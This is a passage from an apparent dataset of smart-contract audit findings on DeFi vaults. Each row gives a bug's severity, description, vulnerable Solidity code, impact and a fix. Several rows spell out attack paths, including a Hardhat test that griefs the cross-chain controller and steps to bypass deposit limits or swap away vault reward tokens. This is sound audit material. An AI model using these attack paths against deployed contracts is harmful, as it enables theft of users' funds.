the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n",XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.,"```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n" +Vault could `rebalance()` before funds arrive from xChainController,medium,"Invoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor ""fast path"" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.",Check if funds are arrived or not,"The vault could `rebalance()` before funds arrive from xChainController, this will reduce rewards","```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n" +Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method,medium,"Deposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`","Use below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n",Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`,"```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n" +Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic,medium,"`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), ""Protocol on blacklist"");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()",You should check if the Protocol on the blacklist when Game players `rebalanceBasket()`,The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.,```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n +Asking for `balanceOf()` in the wrong address,medium,"on sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism the `underlying` address is for Optimism (L2) but `XChainController` is on Mainnet you can't invoke `balanceOf()` like this!!!","Issue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill be always on the Mainnet",Asking for `balanceOf()` in the wrong address The protocol will be not able to rebalance the vault,"```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n" +`getDecimals()` always call the MainNet,medium,`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. `XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invoke `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nThe xProvider.getDecimals() is always call the `address(vault)` from the MainNet. but `address(vault)` could be in any chain `XChainController.pushVaultAmounts()` could keep reverting with all the `chainID` (only the MainNet will be correct ) or it will return the wrong `decimals` values. (if the `address(vault)` is for other chain/L but it exist in the MainNet with a decimals())\\nthis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n,You should invoke `getVaultAddress()` with `_chain` of the Mainnet. because all vaults have the same getDecimals (not all vaultNamber),`pushVaultAmounts()` will keep reverting and this will break all rebalancing logic,```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n +"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price",medium,"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.","Issue User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price\\nIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.",User's rewards calculation is unpredictable.,"```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n" +The protocol could not handle multiple vaults correctly,medium,"The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), ""No rebalance needed"");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`",Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array,The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values,```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n +Vault.blacklistProtocol can revert in emergency,medium,"Vault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.","Provide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(""vault"", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(""vault"", true) and tries to withdraw",Hacked or paused protocol can't be set to blacklist.,"```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n" +Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next period,medium,"Game doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.","First of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.",Player looses all his rewards,"```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n" +MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds,medium,"MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.",You need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.,Reserved funds protection can be broken,"```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n" +maxTrainingDeposit can be bypassed,medium,"It was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`",Issue maxTrainingDeposit can be bypassed\\nIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\n,User can bypass maxTrainingDeposit and deposit more than allowed,"```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n" +Risk of reward tokens being sold by malicious users under certain conditions,high,"Due to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault being sold by malicious users under certain conditions (e.g. if reward tokens equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor a `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set `to` `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted `to` only `trade.sellToken` and `trade.buyToken`, which points `to` either the primary or secondary token of the pool. This prevents other tokens that reside in the vault `from` being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade as it ignores the `trade.sellToken` and `trade.buyToken` , and allow the caller to define arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that attacker is faster than the admin calling the reinvest function. There is a possibility that an attacker executes a `EXACT_IN_BATCH` trade and specifies the `_route[0]` as one of the reward tokens residing on the vault and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.","It is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.","There is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.","```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n" +Slippage/Minimum amount does not work during single-side redemption,high,"The slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` 